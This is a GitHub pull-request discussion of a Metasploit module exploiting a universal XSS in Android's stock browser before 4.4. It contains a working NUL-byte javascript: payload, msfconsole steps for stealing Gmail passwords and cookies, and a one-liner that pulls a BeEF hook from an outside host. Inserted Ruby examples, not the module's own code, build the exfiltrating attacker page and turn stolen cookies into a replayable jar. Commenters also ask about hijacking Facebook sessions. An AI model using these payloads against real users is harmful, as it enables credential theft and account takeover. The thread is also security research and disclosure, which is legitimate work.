Android < 4.4 AOSP (Stock) Browser UXSS: cross-domain cookie/response extraction module #3759

Merged: 6 commits, Sep 11, 2014

jvennix-r7 (Contributor) commented Sep 8, 2014

tl;dr: UXSS in AOSP browser allows for arbitrary cross-domain javascript.

I did not believe this at first, but after some testing it seems true: in AOSP browser before Android 4.4, you can load javascript into any arbitrary frame or window by prepending a NULL byte to a "javascript:..." string. This module automates loading and stealing HTML and cookies from cross-domain frames.

It was noticed at 1337day.com a few days ago, and was originally disclosed at Rafay Hacking Articles.

I don't see a public advisory for this anywhere from the vendor. :(

Note: If the site you are trying to steal uses the X-Frame-Options header, you can enable BYPASS_XFO to serve a one-click exploit that pops open and reuses a window.

Verification
  • Configure the module to steal the contents/cookies of example.com:

    msf> use auxiliary/gather/android_stock_browser_uxss
    msf> set TARGET_URLS http://example.com
    msf> run
    
  • Run the module and browse to it in the Stock AOSP browser on any Android < 4.4

  • You should see the captured HTML contents and (empty) cookie stored as loot

  • Configure the module to use the XFO bypass and steal the contents/cookies of http://www.google.com,https://m.facebook.com,https://www.yahoo.com:

    msf> use auxiliary/gather/android_stock_browser_uxss
    msf> set BYPASS_XFO true
    msf> set TARGET_URLS http://www.google.com,https://m.facebook.com,https://www.yahoo.com
    msf> run
    
  • Run the module and browse to it in the Stock AOSP browser on any Android < 4.4

  • Click the link. The exploit takes a lonnng time but should eventually load each URL individually

  • You should eventually see the captured HTML and (empty) cookie stored as loot
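The injection chain the description above walks through (one named frame per target URL, then window.open() with a NUL-prefixed "javascript:" URL aimed at that frame's name, then cookie/body exfiltration by POST), written out as an added Ruby example. This is not the module's own code: the frame names, the collector path and the single-page layout are assumptions, and the loot record shape follows the `{"cookie":...,"url":...,"body":...,"i":N}` JSON that appears in the test output later in this thread.

```ruby
require 'json'

# Added example, not the module's own code. Assumptions: frames are named
# "uxss<i>", the collector lives at collector_path on the attacker's origin,
# and every target is loaded at once (the BYPASS_XFO popup mode is not modelled).

# Minimal attribute escaping so a target URL cannot break out of the iframe tag.
def html_attr(s)
  s.gsub('&', '&amp;').gsub('"', '&quot;').gsub('<', '&lt;').gsub('>', '&gt;')
end

# JavaScript that runs inside the victim frame once injected. It gathers the
# same fields the module loots (cookie, url, body, index) and POSTs them as JSON
# back to the attacker. The cross-origin POST is delivered even though its
# response cannot be read without CORS, which is all a collector needs.
def exfil_payload(index, collector_path, custom_js = nil)
  js = <<~JS
    (function () {
      var data = {
        cookie: document.cookie,
        url: location.href,
        body: document.body ? document.body.innerHTML : '',
        i: #{index}
      };
      var x = new XMLHttpRequest();
      x.open('POST', #{collector_path.to_json}, true);
      x.send(JSON.stringify(data));
    })();
  JS
  js += custom_js + "\n" if custom_js # CUSTOM_JS-style extra script, runs in the target's origin
  js
end

# The trigger. The six characters \u0000 stay a JavaScript escape inside the
# served page, so the HTML carries no raw NUL byte; the browser expands it when
# the string is evaluated, and a vulnerable AOSP browser then runs the payload
# in the named frame's origin instead of refusing the cross-origin javascript: URL.
INJECT_JS = <<~'JS'
  function inject(i) {
    window.open("\u0000javascript:" + PAYLOADS[i], "uxss" + i);
  }
JS

# Attacker page. PAYLOADS and inject() are defined before any iframe so the
# onload handlers always find them, however fast a frame loads.
def uxss_page(target_urls, collector_path, custom_js = nil)
  payloads = target_urls.each_index.map { |i| exfil_payload(i, collector_path, custom_js) }
  frames = target_urls.each_with_index.map do |url, i|
    %(<iframe name="uxss#{i}" src="#{html_attr(url)}" onload="inject(#{i})"></iframe>)
  end
  <<~HTML
    <html><body>
    <script>
    var PAYLOADS = #{JSON.generate(payloads)};
    #{INJECT_JS}</script>
    #{frames.join("\n")}
    </body></html>
  HTML
end

# Collector side: check that a POSTed body has the loot record shape before
# storing it, so a stray request to the URI path cannot poison the loot.
LOOT_KEYS = %w[cookie url body i].freeze

def parse_loot_record(body)
  rec = JSON.parse(body)
  missing = LOOT_KEYS - rec.keys
  raise ArgumentError, "loot record missing #{missing.join(', ')}" unless missing.empty?
  raise ArgumentError, 'index must be an integer' unless rec['i'].is_a?(Integer)
  rec
end

if __FILE__ == $PROGRAM_NAME
  puts uxss_page(['http://example.com', 'https://www.yahoo.com'], '/c01')
end
```

Targets that send X-Frame-Options never fire the iframe's onload, so no record for them ever reaches parse_loot_record; that silence is the diagnosis problem raised further down in this thread.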

jvennix-r7 added some commits Sep 8, 2014

@jvennix-r7 jvennix-r7 changed the title from Android aosp uxss to Android < 4.4 AOSP (Stock) Browser UXSS: cross-domain cookie/response extraction module Sep 8, 2014

@todb-r7 todb-r7 added the module label Sep 8, 2014

+ OptString.new('CUSTOM_JS', [
+ false,
+ "A string of javascript to execute in the context of the target URLs.",
+ ''
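Review bot: the description string on the third line of this hunk documents neither the `file:/path` form that OptString accepts (the way any script longer than a one-liner will be passed in) nor what an empty default means for the module's behaviour. Suggest something like "JavaScript (or file:/path/to/script.js) to execute in the context of each target URL; leave empty for the default cookie/body collection." so `show options` explains both.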

todb-r7 (Contributor) commented Sep 8, 2014

Any ideas on what to provide here as useful? I wouldn't mind seeing something a little more eye-popping here -- if it's long, you can even add it in as a file: and stash it somewhere under data/exploits (all OptStrings take a file: argument, see https://dev.metasploit.com/api/Msf/OptString.html )

jvennix-r7 (Contributor) commented Sep 9, 2014

@todb-r7 some generic post-UXSS scripts could be written, like "steal autofilled password/form contents", "submit form X with contents Y", or "steal HTTP response headers". Is that what you are thinking?

todb (Contributor) commented Sep 9, 2014

Yeah something along those lines that demos the seriousness of UXSS in general.


@todb-r7 todb-r7 self-assigned this Sep 8, 2014

antisnatchor commented Sep 9, 2014

Hey @todb-r7 @jvennix-r7 why don't you add the BeEF hook when you exploit the UXSS ;-)
I think this would be cool, and you would also benefit from our existing modules.

Anyway, I liked this stuff (the SOP bypass was too obvious :-), but nice exploit.

jvennix-r7 (Contributor) commented Sep 9, 2014

@todb-r7 Here are some steps for demoing the UXSS scripts, using the gmail.com login page as an example. gmail uses X-Frame-Options, so the one-click exploit is used.

Setup:

    msf> set BYPASS_XFO true
    msf> set CLOSE_POPUP false
    msf> set TARGET_URLS https://gmail.com
    msf> set CUSTOM_JS file:/Users/joe/rapid7/msf-pristine/data/exploits/uxss/steal_form.js
    msf> run

Steal entered passwords:

Open the PoC, click the link. A window will pop up containing gmail.com. Attempt to log into gmail.com (using invalid creds is fine). Your entered credentials will be stored as Metasploit loot. You will be immediately asked to save your credentials in the browser; choose yes.

Steal saved passwords:

Now close and relaunch the browser, browse to the PoC, click the link. A window will pop up containing gmail.com. The autofilled password is stolen and saved as loot.

Steal XHR response headers:

    msf> set CUSTOM_JS file:/Users/joe/rapid7/msf-pristine/data/exploits/uxss/steal_headers.js
    msf> rerun

Straightforward: browse to the page, click the link. Response headers get stored as loot.

jvennix-r7 (Contributor) commented Sep 9, 2014

@antisnatchor thanks :D dropping BeEF is easy enough to do with CUSTOM_JS, I think:

    msf> set CUSTOM_JS "var s=document.createElement('script');s.setAttribute('src','http://path.to/beef');document.body.appendChild(s);"

todb-r7 (Contributor) commented Sep 11, 2014

Okay, I was struggling around a little bit with figuring out when an exploit didn't work -- if a site is enforcing the X-Frame-Options header, then there's no indication to the user. Maybe a timeout? Maybe some more vprint_status indicators of what's going on? Not sure.

Shouldn't be a blocker to landing, but it makes it hard to diagnose what's going on.

todb-r7 (Contributor) commented Sep 11, 2014

The example.com scenario works.

msf auxiliary(android_stock_browser_uxss) > show options

Module options (auxiliary/gather/android_stock_browser_uxss):

   Name         Current Setting     Required  Description
   ----         ---------------     --------  -----------
   BYPASS_XFO   false               no        Bypass URLs that have X-Frame-Options by using a one-click popup exploit.
   CLOSE_POPUP  true                no        When BYPASS_XFO is enabled, this closes the popup window after exfiltration.
   CUSTOM_JS                        no        A string of javascript to execute in the context of the target URLs.
   SRVHOST      192.168.43.169      yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT      8080                yes       The local port to listen on.
   SSL          false               no        Negotiate SSL for incoming connections
   SSLCert                          no        Path to a custom SSL certificate (default is randomly generated)
   SSLVersion   SSL3                no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   TARGET_URLS  http://example.com  yes       The comma-separated list of URLs to steal.
   URIPATH      c01                 no        The URI to use for this exploit (default is random)

msf auxiliary(android_stock_browser_uxss) > run
[*] Auxiliary module execution completed
msf auxiliary(android_stock_browser_uxss) > 
[*] Using URL: http://192.168.43.169:8080/c01
[*] Server started.
[*] 192.168.43.150   android_stock_browser_uxss - Request 'GET /c01'
[*] 192.168.43.150   android_stock_browser_uxss - Sending initial HTML ...
[*] 192.168.43.150   android_stock_browser_uxss - Request 'POST /c01'
[+] Collected data from URL: http://example.com/
[+] Saved to: /home/todb/.msf4/loot/20140911131802_default_192.168.43.150_android.client_148715.txt
msf auxiliary(android_stock_browser_uxss) > cat /home/todb/.msf4/loot/20140911131802_default_192.168.43.150_android.client_148715.txt
[*] exec: cat /home/todb/.msf4/loot/20140911131802_default_192.168.43.150_android.client_148715.txt

{"cookie":"","url":"http://example.com/","body":"\n<div>\n    <h1>Example Domain</h1>\n    <p>This domain is established to be used for illustrative examples in documents. You may use this\n    domain in examples without prior coordination or asking for permission.</p>\n    <p><a href=\"http://www.iana.org/domains/example\">More information...</a></p>\n</div>\n\n\n","i":0}msf auxiliary(android_stock_browser_uxss) >

todb-r7 (Contributor) commented Sep 11, 2014

The BYPASS_XFO config seems to work fine as well:

msf auxiliary(android_stock_browser_uxss) > set BYPASS_XFO true
BYPASS_XFO => true
msf auxiliary(android_stock_browser_uxss) > set TARGET_URLS http://www.google.com,https://m.facebook.com,https://www.yahoo.com
TARGET_URLS => http://www.google.com,https://m.facebook.com,https://www.yahoo.com
msf auxiliary(android_stock_browser_uxss) > rexploit
[*] Stopping existing job...

[*] Server stopped.
[*] Reloading module...
[*] Auxiliary module execution completed
msf auxiliary(android_stock_browser_uxss) > 
[*] Using URL: http://192.168.43.169:8080/c01
[*] Server started.
[*] 192.168.43.150   android_stock_browser_uxss - Request 'GET /c01'
[*] 192.168.43.150   android_stock_browser_uxss - Sending initial HTML ...
[*] 192.168.43.150   android_stock_browser_uxss - Request 'POST /c01'
[+] Collected data from URL: http://www.google.com/
[+] Saved to: /home/todb/.msf4/loot/20140911132521_default_192.168.43.150_android.client_418146.txt
[*] 192.168.43.150   android_stock_browser_uxss - Request 'POST /c01'
[+] Collected data from URL: http://www.google.com/
[+] Saved to: /home/todb/.msf4/loot/20140911132522_default_192.168.43.150_android.client_639139.txt
[*] 192.168.43.150   android_stock_browser_uxss - Request 'POST /c01'
[+] Collected data from URL: https://www.yahoo.com/
[+] Saved to: /home/todb/.msf4/loot/20140911132525_default_192.168.43.150_android.client_597115.txt

msf auxiliary(android_stock_browser_uxss) > 

Note that the phone I'm using has never been to Facebook, so that seems to cause a loop on the redirect forever. Mildly annoying, not a blocker.

jvennix-r7 (Contributor) commented Sep 11, 2014

@todb-r7, per the X-Frame-Options confusion, I could probably do something like hook onerror on the iframe, and then send something back to msfconsole saying the frame failed to load on the client.

todb-r7 (Contributor) commented Sep 11, 2014

Password stealing from gmail seems to work like a champ. Woot:

$ grep :\"Email ~/.msf4/loot/*.txt
/home/todb/.msf4/loot/20140911133827_default_192.168.43.150_android.client_269370.txt:{"name":"Email","value":"msf.victim","url":"https://accounts.google.com/ServiceLogin?service=mail&passive=true&continue=https://mail.google.com/mail/?ui%3Dmobile%26zyp%3Dl&scc=1&ltmpl=ecobx&nui=5&btmpl=mobile&emr=1","send":true}

Also works for the password.

Also works for typed passwords, but you get them like one or two characters at a time.

jvennix-r7 (Contributor) commented Sep 11, 2014

@todb-r7, yeah, there's no real good way to check that the popup window has actually loaded, thanks to SOP. I basically wait until I can't access the new window from JS (due to SOP), then wait a few moments for the document.body/synchronous script frames to finish loading, and then I try injecting. This can fail in a redirect loop, or if the init scripts in the document are huge and long. There is a final injection attempt after ~10 seconds in case we hit this condition; after that the script should give up and move on.

Tbh, loading multiple documents in the same popup window is a bit of a parlor trick (what kind of user is going to sit there and watch all their sensitive sites load one by one?), but it is neat to watch and proves that opt-in XFO headers are really not an obstacle to UXSS.

jvennix-r7 (Contributor) commented Sep 11, 2014

@todb-r7 so the reason it gets them 1-2 chars at a time is that I am installing a JavaScript loop that checks for changed inputs and sends them up on the fly. This was the easiest thing to do, and has the added benefit of catching any accidental input (e.g. I accidentally typed the password for Facebook into gmail.com, oops).

I feel like the multiple JSON files are unnecessary though; do you think I should just do store_loot once and then append any more JSON responses to the same file?

todb-r7 (Contributor) commented Sep 11, 2014

Yeah this is kind of a big deal. Let's see if I can't throw some more recent refs on this, then land it.

FWIW I tested on my Kyocera Hydro C5170. Bought it earlier this year, it's running Android 4.0.4, carrier is Boost Mobile.

Other details:

Build number IML77, Software version 1.010BT, Kernel version 3.0.8-perf (released Aug 7, 14:26:30 JST 2013).

Let's see if I have any updates it's not telling me about... well I get a "Network Busy" error, whatever that means, so I'll just say no.

todb-r7 added a commit to todb-r7/metasploit-framework that referenced this pull request Sep 11, 2014

todb-r7 (Contributor) commented Sep 11, 2014

PR coming your way @jvennix-r7 just some quick eyeballs is enough.

@todb-r7 todb-r7 merged commit 7793ed4 into rapid7:master Sep 11, 2014

1 check passed: continuous-integration/travis-ci (The Travis CI build passed)

todb-r7 added a commit that referenced this pull request Sep 11, 2014

Land #3759, Android UXSS, with ref/desc fixes
Incidentally, this also closes jvennix-r7#14 (let's see if I can close a
PR by merging from another repo!)

Also fixes #3782 (opened by accident).

rafaybaloch commented Sep 15, 2014

I tried reporting this issue to Google way before I blogged about it; they were unable to reproduce it despite all my efforts and closed the issue. And when I released the blog post, they replied with the following:

"Rafay,

After continued testing we were able to reproduce this. We are now working internally on a suitable fix.

-- Josh Armour
-- Android Security"

@antisnatchor Agreed, but despite it being so simple it was never found by anyone ;).

todb-r7 (Contributor) commented Sep 15, 2014

Just to confirm, I tested com.android.browser, version 4.4.4-1f023a4eca on my CyanogenMod build for Android, and the vuln appears patched there. The example.com attack isn't effective, at any rate.

jvennix-r7 (Contributor) commented Sep 16, 2014

@todb-r7 I am now thinking this was patched when they replaced the internals of WebView to use Chrome. So the bug was fixed as a side-effect. Commit:

https://android.googlesource.com/platform/frameworks/base/+/94c0057d67c2e0a4b88a4f735388639210260d0e

jvennix-r7 (Contributor) commented Sep 16, 2014

@fritek373 , sample test:

    <!-- Loads a cross-origin page into a named frame, then targets that frame
         with a NUL-prefixed javascript: URL. A vulnerable browser alerts the
         framed site's domain; a patched one refuses the navigation. -->
    <iframe name="test" src="http://www.rhainfosec.com" onload="f()"></iframe>
    <script>
      function f() {
        window.open('\u0000javascript:alert(document.domain)', 'test');
      }
    </script>

fritek373 commented Sep 16, 2014

@todb-r7 Yeah, I understand :)

jvennix-r7 (Contributor) commented Sep 16, 2014

@antisnatchor we've added a REMOTE_JS datastore option to make dropping your BeEF hook a snap: #3801

antisnatchor commented Sep 17, 2014

@jvennix-r7 thanks, makes sense ;-)

todb-r7 (Contributor) commented Sep 18, 2014

Confirmed on:

Samsung SPH-M830 (Galaxy Rush)

Android 4.1.2, kernel version 3.0.31-1175327

Carrier: Boost Mobile Networks (USA)

No firmware update available.

armujahid commented Sep 21, 2014

Can anyone tell me how to automatically import cookies from the loot file into the browser? :P It has both cookies and HTML. I know how to manually import it, but I want to use an automatic tool like Cookie Manager or the Greasemonkey cookie injector.

fritek373 commented Sep 21, 2014

In Chrome:
https://chrome.google.com/webstore/detail/editthiscookie/fngmhnnpilhplaeedifhccceomclgfbg?hl=nl

armujahid commented Sep 21, 2014

The loot file doesn't contain complete cookies. I have tried to sidejack a Facebook session, but I only got c_user and csm; datr is missing from the cookies.

rafaybaloch commented Sep 21, 2014

Well, it's due to the fact that Facebook uses the HttpOnly flag for the session cookie xs, but you can read the response using the innerHTML property.

jvennix-r7 (Contributor) commented Sep 21, 2014

@armujahid You will probably have better luck posting on the discussion boards here. As @rafaybaloch notes, you still can't steal HttpOnly cookies. However, you can find the CSRF token and you can send requests with this cookie attached, so you could send a request to something like a /password_change endpoint.

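Two questions raised earlier in this thread, how to get the cookies in a loot file into a browser and why captured form values arrive one or two characters at a time, as an added Ruby example that is not part of the module: it folds the per-change loot records into final field values and writes the cookie strings out as a Netscape cookie jar that `curl -b` can load. The records are constructed here using the field names shown in this thread; the Passwd field and its values are made up, and the loot files are assumed to be processed in filename (timestamp) order.

```ruby
require 'json'
require 'uri'

# Added example, not part of the module. One JSON object per loot file,
# constructed here to stand in for the files under ~/.msf4/loot, in timestamp
# order. The first record is a cookie/body capture; the rest are form-field
# snapshots, one per change event, so a typed password arrives in pieces.
SAMPLE_LOOT = [
  '{"cookie":"c_user=100; csm=2","url":"https://m.facebook.com/","body":"<div></div>","i":0}',
  '{"name":"Email","value":"msf.victim","url":"https://accounts.google.com/ServiceLogin","send":true}',
  '{"name":"Passwd","value":"hu","url":"https://accounts.google.com/ServiceLogin","send":true}',
  '{"name":"Passwd","value":"hunt","url":"https://accounts.google.com/ServiceLogin","send":true}',
  '{"name":"Passwd","value":"hunter2","url":"https://accounts.google.com/ServiceLogin","send":true}'
].freeze

def load_loot(json_lines)
  json_lines.map { |line| JSON.parse(line) }
end

# Form records: the injected watcher posts the whole field value on every
# change, so the last snapshot per (url, field) is the value the victim
# ended up with. Earlier snapshots are kept only implicitly, by being overwritten.
def form_values(records)
  records.select { |r| r.key?('name') && r.key?('value') }
         .each_with_object({}) { |r, h| h[[r['url'], r['name']]] = r['value'] }
end

# document.cookie is "name=value; name2=value2"; values may themselves contain '='.
def parse_cookie_string(str)
  str.split(/;\s*/).reject(&:empty?)
     .map { |pair| pair.split('=', 2) }
     .map { |name, value| [name.strip, (value || '').strip] }
end

# Netscape cookie jar lines, loadable with `curl -b jar.txt`. document.cookie
# carries no domain, path or expiry attributes, so these are conservative
# guesses: host-only, path "/", session cookie, Secure iff the page was https.
# HttpOnly cookies never appear in document.cookie, so a jar built this way can
# lack the one that actually holds the session (Facebook's xs in the thread above).
def cookie_jar(records)
  responses = records.select { |r| r.key?('cookie') && r.key?('url') }
  responses.flat_map do |r|
    uri = URI.parse(r['url'])
    secure = uri.scheme == 'https' ? 'TRUE' : 'FALSE'
    parse_cookie_string(r['cookie']).map do |name, value|
      [uri.host, 'FALSE', '/', secure, '0', name, value].join("\t")
    end
  end
end

if __FILE__ == $PROGRAM_NAME
  recs = load_loot(SAMPLE_LOOT)
  form_values(recs).each { |(url, name), v| puts "#{url} #{name}=#{v}" }
  puts '# Netscape HTTP Cookie File'
  puts cookie_jar(recs)
end
```

Because the jar only ever holds what document.cookie exposed, a session that depends on an HttpOnly cookie will not replay from it; the CSRF-token-plus-authenticated-request route described above has to be driven from inside the victim's browser instead.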

dimpol commented Jul 6, 2016

Hi everyone, first of all a big thanks to @rafaybaloch for his help. I am trying to do the exact same thing, but between a tab and a triggered WebView in the browser (from a browsable intent), meaning that I would like to access the triggered WebView's contents (e.g. innerHTML). So what I did was execute the msf module with set TARGET_URLS = intent:#Intent;S.url=http://attackersite.com;SEL;component=com.package.name/Activityname; Don't pay attention to what I am writing on the intent:# part; just focus on the fact that the module creates a page that, when visited by the victim, triggers a WebView (from the app with the browsable intent). So far everything is great. The thing is, I am not yet able to get the triggered WebView's contents like it would normally do on a page if we set TARGET_URLS = the page we want to target. I think the triggered WebView's contents should be accessible somehow, just like the module does for web pages... any ideas? Ideally I would like to inject BeEF into the triggered WebView. *All that trouble because I am trying to prove that a remotely triggered WebView (due to a browsable intent) chained with a SOP bypass is a serious attack...
